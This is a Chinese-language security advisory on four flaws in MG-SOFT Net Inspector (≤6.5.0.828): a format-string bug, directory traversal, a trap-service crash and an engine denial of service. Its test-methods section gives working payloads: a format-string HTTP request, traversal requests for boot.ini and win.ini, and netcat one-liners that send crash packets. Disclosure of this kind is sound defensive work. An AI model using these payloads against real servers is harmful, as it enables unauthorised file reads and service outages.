发布日期：2008-03-17
更新日期：2008-03-18

受影响系统：

MG-SOFT Net Inspector <= 6.5.0.828

描述：

---

BUGTRAQ  ID: 28266

MG-SOFT Net Inspector是一个综合的网络管理系统（NMS）应用程序，能够监控并管理多协议分布式系统，如计算机网络或公共交换网络等。

Net Inspector的实现上存在多个安全漏洞，远程攻击者可能利用这些漏洞控制服务器或导致拒绝服务。

---------------------------
A] mghttpd格式串漏洞
---------------------------

mghttpd是运行在5228端口上的HTTP守护程序，允许客户端下载Net Inspector Java客户端。这个服务程序中用于在日志文件中记录客户端请求的函数存在格式串漏洞。

---------------------------------
B] mghttpd目录遍历
---------------------------------

如果向mghttpd服务提交了包含有斜线和反斜线分隔符的请求的话，就可以执行目录遍历攻击，从服务器的磁盘下载文件。

--------------------
C] MgWTrap3崩溃
--------------------

如果向MgWTrap3.exe服务所运行的端口发送了UDP报文的话，就可能导致服务崩溃。

--------------------------------
D] niengine拒绝服务
--------------------------------

如果发送了畸形的或不完整的报文的话，就可以导致Net Inspector Fault Management服务器（niengine）僵死，耗尽100%的CPU使用率和内存。

<*来源：Luigi Auriemma （aluigi@pivx.com）
  
  链接：http://secunia.com/advisories/29421/
        http://marc.info/?l=bugtraq&m=120577839706935&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

A]
GET /%n%n%s%s%n%n%n%s HTTP/1.0

B]
GET ../../../../boot.ini HTTP/1.0
GET \../..\../..\windows/win.ini HTTP/1.0

C]
echo|nc SERVER PORT -v -v -u

D]
echo -n -e \x2a\x45\x67\xf2\x00\x00\x00\x00|nc SERVER 5221 -v -v -w 1

建议：

---

厂商补丁：

MG-SOFT
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mg-soft.com/netinsp.html

浏览次数：2826
严重程度：0（网友投票）